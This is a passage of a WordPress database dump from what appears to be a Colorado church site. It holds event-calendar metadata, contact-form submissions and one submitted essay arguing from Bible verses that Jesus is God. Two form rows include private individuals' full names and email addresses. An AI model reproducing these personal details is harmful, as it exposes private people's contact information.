Colorado\";}'),(85683,258287,'_form_id','21'),(85684,258287,'_seq_num','89'),(92069,261526,'_form_id','13'),(92070,261526,'_seq_num','45'),(85775,258304,'_field_133','John'),(85776,258304,'_field_134','Lawrence'),(85777,258304,'_field_135','jackl65@yahoo.com'),(85778,258304,'_field_137','Seminar'),(85779,258304,'_field_138','Please send information on Sept. 19-20 seminar.  Thank you'),(85780,258304,'_form_id','13'),(85781,258304,'_seq_num','39'),(85782,258305,'_field_133','Michael'),(85783,258305,'_field_134','Manning'),(85784,258305,'_field_135','mgmanning@coloradomtn.edu'),(85785,258305,'_field_137','Steamboat Springs'),(85786,258305,'_field_138','Where is the nearest location to Steamboat Springs that has a Sunday service?'),(85787,258305,'_form_id','13'),(85788,258305,'_seq_num','40'),(119112,262963,'_EventTimezone','America/Denver'),(119111,262963,'_EventURL',''),(119105,262963,'_EventShowMapLink','1'),(119106,262963,'_EventShowMap','1'),(119107,262963,'_EventVenueID','262507'),(119108,262963,'_EventCurrencySymbol',''),(119109,262963,'_EventCurrencyPosition','prefix'),(119110,262963,'_EventCost',''),(119100,262963,'_RTECwhoCanRegister','any'),(117125,262884,'_EventVenueID','262507'),(117126,262884,'_EventCurrencySymbol',''),(117127,262884,'_EventCurrencyPosition','prefix'),(117128,262884,'_EventCost',''),(117129,262884,'_EventURL',''),(117130,262884,'_EventTimezone','America/Denver'),(117131,262884,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610280900;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613304900;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615724100;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1618143300;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620562500;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623586500;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1626005700;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628424900;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631448900;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1633868100;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117237,262888,'_RTECdeadlineType','start'),(117142,262885,'protect_children',''),(117136,262885,'_EventStartDate','2021-03-14 12:15:00'),(117137,262885,'_EventStartDateUTC','2021-03-14 18:15:00'),(117236,262888,'_RTECregistrationsDisabled','1'),(117138,262885,'_EventEndDate','2021-03-14 13:45:00'),(117139,262885,'_EventEndDateUTC','2021-03-14 19:45:00'),(117140,262885,'_EventDuration','5400'),(117141,262885,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512443;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512443;s:26:\"_RTECregistrationsDisabled\";i:1607512443;s:17:\"_RTECdeadlineType\";i:1607512443;s:19:\"_RTECwhoCanRegister\";i:1607512443;s:23:\"_RTEClimitRegistrations\";i:1607512443;s:21:\"_RTECmaxRegistrations\";i:1607512443;s:16:\"_EventRecurrence\";i:1607512443;s:17:\"_EventShowMapLink\";i:1607512443;s:13:\"_EventShowMap\";i:1607512443;s:13:\"_EventVenueID\";i:1607512443;s:20:\"_EventCurrencySymbol\";i:1607512443;s:22:\"_EventCurrencyPosition\";i:1607512443;s:10:\"_EventCost\";i:1607512443;s:9:\"_EventURL\";i:1607512443;s:14:\"_EventTimezone\";i:1607512443;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512443;s:16:\"tribe_events_cat\";i:1607537643;}'),(117143,262885,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512443;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512443;s:26:\"_RTECregistrationsDisabled\";i:1607512443;s:17:\"_RTECdeadlineType\";i:1607512443;s:19:\"_RTECwhoCanRegister\";i:1607512443;s:23:\"_RTEClimitRegistrations\";i:1607512443;s:21:\"_RTECmaxRegistrations\";i:1607512443;s:16:\"_EventRecurrence\";i:1607512443;s:17:\"_EventShowMapLink\";i:1607512443;s:13:\"_EventShowMap\";i:1607512443;s:13:\"_EventVenueID\";i:1607512443;s:20:\"_EventCurrencySymbol\";i:1607512443;s:22:\"_EventCurrencyPosition\";i:1607512443;s:10:\"_EventCost\";i:1607512443;s:9:\"_EventURL\";i:1607512443;s:14:\"_EventTimezone\";i:1607512443;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512443;s:16:\"tribe_events_cat\";i:1607537643;}'),(86150,258547,'_field_137','Jesus the “Almighty God”'),(86151,258547,'_field_138','Jesus the “Almighty God”\n\nIf you look at Psalm 100:3 it says: “Acknowledge that the LORD is God!  He made us, and we are his.”\n\nMany times Jesus referred to His own deity, both directly and indirectly, Jesus used the terms “Son of Man” and “Son of God” often.  Both referred to His divine nature (Daniel 7:13,14; Matthew 26:63,64).  Jesus also used the specific words I am (Ego eimi in Greek, Ani bu in Hebrew) on several occasions (e.g., John 8:56-58).  God used these same words to describe Himself to Moses.  Jesus also states specifically that He and God (Father) are “one” (John 10:30), meaning, the same substance, nature and essence.\n\nWe also find in Isaiah 9:6, that Jesus is referred to as a “Mighty God”\n\nDid you know that “Mighty God” is translated from Hebrew word Elohim,  a very common name for God in the Old Testament; used 2,570 times.  Means: “strong one” plural ending (im in Hebrew) indicates fullness of power.  “God of all the earth” “God of heaven”.\n\nJesus is called “Everlasting Father” in Isaiah 9:6,  is better translated “Father of eternity” in this context carry the meaning “possessor of eternity.”\n\nIn Isaiah 40:3, we find that Jesus is called both Yahweh (Jehovah) and Elohim in the same verse.  This verse was written in reference to future ministry of Jesus (see John 1:23) and represents one of the strongest affirmations of Christ’s deity in the O.T.\n\nWe all know that we only pray directly to God, refer to John 14:13, John 15:16 you will find that we direct our prayers to Jesus.\n\nWe also know that we only worship God, Jesus always accepted such worship as appropriate: \n\nFrom Peter  (Luke 5:8)\nFrom Thomas  (John 20:28)\nFrom Angels  (Heb 1:6)\nFrom Old Testament saints  (Joshua 5-13-15)\nFrom Demons  (Mark 5:6)\nWe see all of heaven worshiping Jesus  (Rev 5:11)\n\n\nWhat the Bible says about Jesus\nRevelation 1:7-8 says:  Jesus is the Almighty\nGenesis 17:1 says:  The Almighty is God\n\nJohn 18:51 says:  Jesus is the I Am\nExodus 3:14 says:  The I Am is God\n\nJohn 8:24 says:  Jesus is I Am He\nIsaiah 43:10 says:  I Am He is God\n\nHebrews 1:6 says:  Angels worship Jesus\nPsalm 148:2 says:  Angels worship God\n\nActs 4:12 says:  Jesus is the One Savior\nIsaiah 45:21 says:  The One Savior is God\n\nLuke 1:68 says:  Jesus is the One Redeemer\nIsaiah 41:14 says:  The One Redeemer is God\n\nPhilippians 2:10 says:  Every knee must bow to Jesus\nIsaiah 45:23 says:  Every knee must bow to God\n\nDid you know that there are about 3,856 verses directly or indirectly concerned with prophecy in Scripture, about one verse in six tells of future events?  God’s challenge to the world is “Prove Me now, I am the Lord … I will speak, and the word that I speak shall come to pass.”  (See Jeremiah 28:9; Ezekiel 12:25)  Buddhists, Confucianists, and Muslims have their own sacred writings, but in them the element of prophecy is obviously absent.  \n\nIn the brief life of Jesus alone we see over 300 fulfilled prophecies!  Only Jesus as an all-knowing God could make and fulfill.\n\n\nHere are few other biblical passages proving that Jesus is God: \n\nIsaiah 44:6\n“Thus says the LORD, the King of Israel, and his Redeemer, the Lord of\nhost: “I am the First and I am the Last; besides Me there is no God.’”\n\nIsaiah 43:10\n“You are My witnesses,” says the LORD, “And My servant whom I have \nchosen, That you may know and believe Me, And understand that I am He.\nBefore Me there was no God formed, Nor shall be after ME.”\n\nRevelation 1:8\n“I am the Alpha and the Omega, the Beginning and the End,” says the\nLord, “who is and who was and who is to come, the Almighty.”\n\nRevelation 21:6\n“And He said to me, ‘It is done! I am the Alpha and the Omega, the\nBeginning and the End.’”\n\n1 John 5:20\n“And we know that the Son of God has come and has given us an \nunderstanding, that we may know Him who is true; and we are in Him who is\ntrue, in His Son Jesus Christ. This is the true God and eternal life.”\n\n1 Timothy 3:16\n“And without controversy great is the mystery of godliness: God was \nmanifested in the flesh, justified in the Spirit, seen by angels, preached\namong he Gentiles, believed on in the world, \nreceived up in glory.”\n\nTitus 2:13\n“...looking for the blessed hope and glorious appearing of our great God\nand Savior Jesus Christ…”\n\nJohn 8:58\nJesus said to them, ‘Most assuredly, I say to you, before Abraham was,\nI AM.’”\n\nIsaiah 7:14\n“Therefore the Lord Himself will give you a sign: Behold, the virgin shall \nconceive and bear a Son, and shall call His name Immanuel.”\n(Immanuel translated:  “God among us.”)\n\nPhilippians 2:10-11\n“…that at the name of Jesus every knee should bow, of those in heaven, and\nof those on earth, and of those under the earth, and that every tongue should \nconfess that Jesus Christ is Lord, to the glory of God the Father.”\n\n(There will come a day that all angels, all prophets, all religious leaders, including Buddha, Confucius, Muhammad bowing down to Jesus)\n\nWe also find in Scripture that Jesus is described as: \n\n•	OMINIPRESENT  Matt. 28:20\n•	OMNISCIENT  John 2:24\n•	OMNIPOTENT  Heb.1:3\n•	CREATOR  John 1:1-3\n•	ETERNAL  Micah 5:2, Heb 1:8\n•	GOD  Heb. 1:8; Titus 2:13; John 1:1; John 20:28\nConclusion: We clearly see that Jesus Christ claims to be God in human flesh and clearly identified as God. He is to be prayed to, worshiped to, and possess the many attributes of God.\n\nCan you see now, that Jesus is God?\n\n'),(86152,258547,'_form_id','13'),(86153,258547,'_seq_num','42'),(119024,262960,'_EventTimezone','America/Denver'),(119025,262960,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610269200;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613293200;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1615712400;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618131600;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1620550800;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1623574800;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1625994000;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1628413200;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1631437200;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1633856400;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(119023,262960,'_EventURL',''),(119022,262960,'_EventCost',''),(119017,262960,'_EventShowMapLink','1'),(119018,262960,'_EventShowMap','1'),(119019,262960,'_EventVenueID','262507'),(119020,262960,'_EventCurrencySymbol',''),(119021,262960,'_EventCurrencyPosition','prefix'),(119010,262960,'_RTECregistrationsDisabled','1'),(119011,262960,'_RTECdeadlineType','start'),(119012,262960,'_RTECwhoCanRegister','any'),(119013,262960,'_RTEClimitRegistrations','0'),(119008,262960,'_EventOrigin','events-calendar'),(119016,262960,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119014,262960,'_RTECmaxRegistrations','30'),(119015,262960,'boldgrid_hide_page_title','0'),(119006,262960,'protect_children',''),(119000,262960,'_EventStartDate','2021-08-08 09:00:00'),(119001,262960,'_EventStartDateUTC','2021-08-08 15:00:00'),(119002,262960,'_EventEndDate','2021-08-08 10:15:00'),(119003,262960,'_EventEndDateUTC','2021-08-08 16:15:00'),(119007,262960,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545354;s:16:\"protect_children\";i:1607545354;s:13:\"_thumbnail_id\";i:1607545354;s:26:\"_RTECregistrationsDisabled\";i:1607545354;s:17:\"_RTECdeadlineType\";i:1607545354;s:19:\"_RTECwhoCanRegister\";i:1607545354;s:23:\"_RTEClimitRegistrations\";i:1607545354;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(119004,262960,'_EventDuration','4500'),(119005,262960,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545354;s:16:\"protect_children\";i:1607545354;s:13:\"_thumbnail_id\";i:1607545354;s:26:\"_RTECregistrationsDisabled\";i:1607545354;s:17:\"_RTECdeadlineType\";i:1607545354;s:19:\"_RTECwhoCanRegister\";i:1607545354;s:23:\"_RTEClimitRegistrations\";i:1607545354;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(118995,262959,'_EventTimezone','America/Denver'),(118996,262959,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610269200;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613293200;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1615712400;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618131600;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1620550800;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1623574800;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1625994000;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1628413200;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1631437200;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1633856400;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118994,262959,'_EventURL',''),(118988,262959,'_EventShowMapLink','1'),(118989,262959,'_EventShowMap','1'),(118990,262959,'_EventVenueID','262507'),(118991,262959,'_EventCurrencySymbol',''),(118992,262959,'_EventCurrencyPosition','prefix'),(118993,262959,'_EventCost',''),(118981,262959,'_RTECregistrationsDisabled','1'),(118982,262959,'_RTECdeadlineType','start'),(118983,262959,'_RTECwhoCanRegister','any'),(118984,262959,'_RTEClimitRegistrations','0'),(118979,262959,'_EventOrigin','events-calendar'),(118952,262958,'_RTECregistrationsDisabled','1'),(118953,262958,'_RTECdeadlineType','start'),(118954,262958,'_RTECwhoCanRegister','any'),(118955,262958,'_RTEClimitRegistrations','0'),(118956,262958,'_RTECmaxRegistrations','30'),(118957,262958,'boldgrid_hide_page_title','0'),(118958,262958,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118959,262958,'_EventShowMapLink','1'),(118960,262958,'_EventShowMap','1'),(118961,262958,'_EventVenueID','262507'),(118962,262958,'_EventCurrencySymbol',''),(118963,262958,'_EventCurrencyPosition','prefix'),(118964,262958,'_EventCost',''),(118965,262958,'_EventURL',''),(118966,262958,'_EventTimezone','America/Denver'),(118967,262958,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610269200;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613293200;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1615712400;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618131600;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1620550800;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1623574800;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1625994000;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1628413200;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1631437200;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1633856400;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118987,262959,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118977,262959,'protect_children',''),(118978,262959,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545354;s:16:\"protect_children\";i:1607545354;s:13:\"_thumbnail_id\";i:1607545354;s:26:\"_RTECregistrationsDisabled\";i:1607545354;s:17:\"_RTECdeadlineType\";i:1607545354;s:19:\"_RTECwhoCanRegister\";i:1607545354;s:23:\"_RTEClimitRegistrations\";i:1607545354;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(118971,262959,'_EventStartDate','2021-07-11 09:00:00'),(88997,259137,'_EventVenueID','52069'),(88998,259137,'_EventCurrencySymbol',''),(88999,259137,'_EventCurrencyPosition','prefix'),(118942,262958,'_EventStartDate','2021-06-13 09:00:00'),(118973,262959,'_EventEndDate','2021-07-11 10:15:00'),(118943,262958,'_EventStartDateUTC','2021-06-13 15:00:00'),(118944,262958,'_EventEndDate','2021-06-13 10:15:00'),(118945,262958,'_EventEndDateUTC','2021-06-13 16:15:00'),(118946,262958,'_EventDuration','4500'),(118947,262958,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545354;s:16:\"protect_children\";i:1607545354;s:13:\"_thumbnail_id\";i:1607545354;s:26:\"_RTECregistrationsDisabled\";i:1607545354;s:17:\"_RTECdeadlineType\";i:1607545354;s:19:\"_RTECwhoCanRegister\";i:1607545354;s:23:\"_RTEClimitRegistrations\";i:1607545354;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(118972,262959,'_EventStartDateUTC','2021-07-11 15:00:00'),(87251,128672,'_EventOrigin','events-calendar'),(87252,128672,'_tribe_modified_fields','a:27:{s:12:\"_EventOrigin\";i:1582814976;s:13:\"_thumbnail_id\";i:1582814976;s:24:\"boldgrid_hide_page_title\";i:1582814976;s:16:\"_EventRecurrence\";i:1582815141;s:17:\"_EventShowMapLink\";i:1582814976;s:13:\"_EventShowMap\";i:1582814976;s:13:\"_EventVenueID\";i:1582814976;s:20:\"_EventCurrencySymbol\";i:1582814976;s:22:\"_EventCurrencyPosition\";i:1582814976;s:10:\"_EventCost\";i:1582814976;s:9:\"_EventURL\";i:1582814976;s:14:\"_EventTimezone\";i:1582814976;s:27:\"_EventNextPendingRecurrence\";i:1582814976;s:16:\"protect_children\";i:1582814976;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1582814976;s:20:\"_EventOriginalParent\";i:1582814976;s:11:\"post_parent\";i:1582814976;s:10:\"_edit_last\";i:1582815139;s:16:\"tribe_events_cat\";i:1582840339;s:10:\"post_title\";i:1582815141;s:12:\"post_content\";i:1582815141;s:15:\"_EventStartDate\";i:1582815141;s:13:\"_EventEndDate\";i:1582815141;s:18:\"_EventStartDateUTC\";i:1582815141;s:16:\"_EventEndDateUTC\";i:1582815141;s:14:\"_EventDuration\";i:1582815141;s:18:\"_EventTimezoneAbbr\";i:1582815141;}'),(87250,128672,'_tribe_modified_fields','a:27:{s:12:\"_EventOrigin\";i:1582814976;s:13:\"_thumbnail_id\";i:1582814976;s:24:\"boldgrid_hide_page_title\";i:1582814976;s:16:\"_EventRecurrence\";i:1582815141;s:17:\"_EventShowMapLink\";i:1582814976;s:13:\"_EventShowMap\";i:1582814976;s:13:\"_EventVenueID\";i:1582814976;s:20:\"_EventCurrencySymbol\";i:1582814976;s:22:\"_EventCurrencyPosition\";i:1582814976;s:10:\"_EventCost\";i:1582814976;s:9:\"_EventURL\";i:1582814976;s:14:\"_EventTimezone\";i:1582814976;s:27:\"_EventNextPendingRecurrence\";i:1582814976;s:16:\"protect_children\";i:1582814976;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1582814976;s:20:\"_EventOriginalParent\";i:1582814976;s:11:\"post_parent\";i:1582814976;s:10:\"_edit_last\";i:1582815139;s:16:\"tribe_events_cat\";i:1582840339;s:10:\"post_title\";i:1582815141;s:12:\"post_content\";i:1582815141;s:15:\"_EventStartDate\";i:1582815141;s:13:\"_EventEndDate\";i:1582815141;s:18:\"_EventStartDateUTC\";i:1582815141;s:16:\"_EventEndDateUTC\";i:1582815141;s:14:\"_EventDuration\";i:1582815141;s:18:\"_EventTimezoneAbbr\";i:1582815141;}'),(118936,262957,'_EventURL',''),(118180,262873,'protect_children',''),(118181,262873,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513498;s:12:\"_EventOrigin\";i:1607513498;s:13:\"_thumbnail_id\";i:1607513498;s:26:\"_RTECregistrationsDisabled\";i:1607513498;s:17:\"_RTECdeadlineType\";i:1607513498;s:19:\"_RTECwhoCanRegister\";i:1607513498;s:23:\"_RTEClimitRegistrations\";i:1607513498;s:21:\"_RTECmaxRegistrations\";i:1607513498;s:24:\"boldgrid_hide_page_title\";i:1607513498;s:16:\"_EventRecurrence\";i:1607513498;s:17:\"_EventShowMapLink\";i:1607513498;s:13:\"_EventShowMap\";i:1607513498;s:13:\"_EventVenueID\";i:1607513498;s:20:\"_EventCurrencySymbol\";i:1607513498;s:22:\"_EventCurrencyPosition\";i:1607513498;s:10:\"_EventCost\";i:1607513498;s:9:\"_EventURL\";i:1607513498;s:14:\"_EventTimezone\";i:1607513498;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513498;}'),(116825,262874,'_EventStartDate','2021-04-04 11:30:00'),(116826,262874,'_EventStartDateUTC','2021-04-04 17:30:00'),(116827,262874,'_EventEndDate','2021-04-04 12:45:00'),(116828,262874,'_EventEndDateUTC','2021-04-04 18:45:00'),(116829,262874,'_EventDuration','4500'),(118869,262955,'_RTECmaxRegistrations','30'),(118870,262955,'boldgrid_hide_page_title','0'),(118863,262955,'_EventOrigin','events-calendar'),(118866,262955,'_RTECdeadlineType','start'),(118867,262955,'_RTECwhoCanRegister','any'),(118860,262955,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545353;s:16:\"protect_children\";i:1607545353;s:13:\"_thumbnail_id\";i:1607545353;s:26:\"_RTECregistrationsDisabled\";i:1607545353;s:17:\"_RTECdeadlineType\";i:1607545353;s:19:\"_RTECwhoCanRegister\";i:1607545353;s:23:\"_RTEClimitRegistrations\";i:1607545353;s:21:\"_RTECmaxRegistrations\";i:1607545353;s:24:\"boldgrid_hide_page_title\";i:1607545353;s:16:\"_EventRecurrence\";i:1607545353;s:17:\"_EventShowMapLink\";i:1607545353;s:13:\"_EventShowMap\";i:1607545353;s:13:\"_EventVenueID\";i:1607545353;s:20:\"_EventCurrencySymbol\";i:1607545353;s:22:\"_EventCurrencyPosition\";i:1607545353;s:10:\"_EventCost\";i:1607545353;s:9:\"_EventURL\";i:1607545353;s:14:\"_EventTimezone\";i:1607545353;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545353;s:16:\"tribe_events_cat\";i:1607570553;}'),(118861,262955,'protect_children',''),(118855,262955,'_EventStartDate','2021-03-14 09:00:00'),(118856,262955,'_EventStartDateUTC','2021-03-14 15:00:00'),(118862,262955,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545353;s:16:\"protect_children\";i:1607545353;s:13:\"_thumbnail_id\";i:1607545353;s:26:\"_RTECregistrationsDisabled\";i:1607545353;s:17:\"_RTECdeadlineType\";i:1607545353;s:19:\"_RTECwhoCanRegister\";i:1607545353;s:23:\"_RTEClimitRegistrations\";i:1607545353;s:21:\"_RTECmaxRegistrations\";i:1607545353;s:24:\"boldgrid_hide_page_title\";i:1607545353;s:16:\"_EventRecurrence\";i:1607545353;s:17:\"_EventShowMapLink\";i:1607545353;s:13:\"_EventShowMap\";i:1607545353;s:13:\"_EventVenueID\";i:1607545353;s:20:\"_EventCurrencySymbol\";i:1607545353;s:22:\"_EventCurrencyPosition\";i:1607545353;s:10:\"_EventCost\";i:1607545353;s:9:\"_EventURL\";i:1607545353;s:14:\"_EventTimezone\";i:1607545353;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545353;s:16:\"tribe_events_cat\";i:1607570553;}'),(118857,262955,'_EventEndDate','2021-03-14 10:15:00'),(118858,262955,'_EventEndDateUTC','2021-03-14 16:15:00'),(118859,262955,'_EventDuration','4500'),(118865,262955,'_RTECregistrationsDisabled','1'),(118871,262955,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 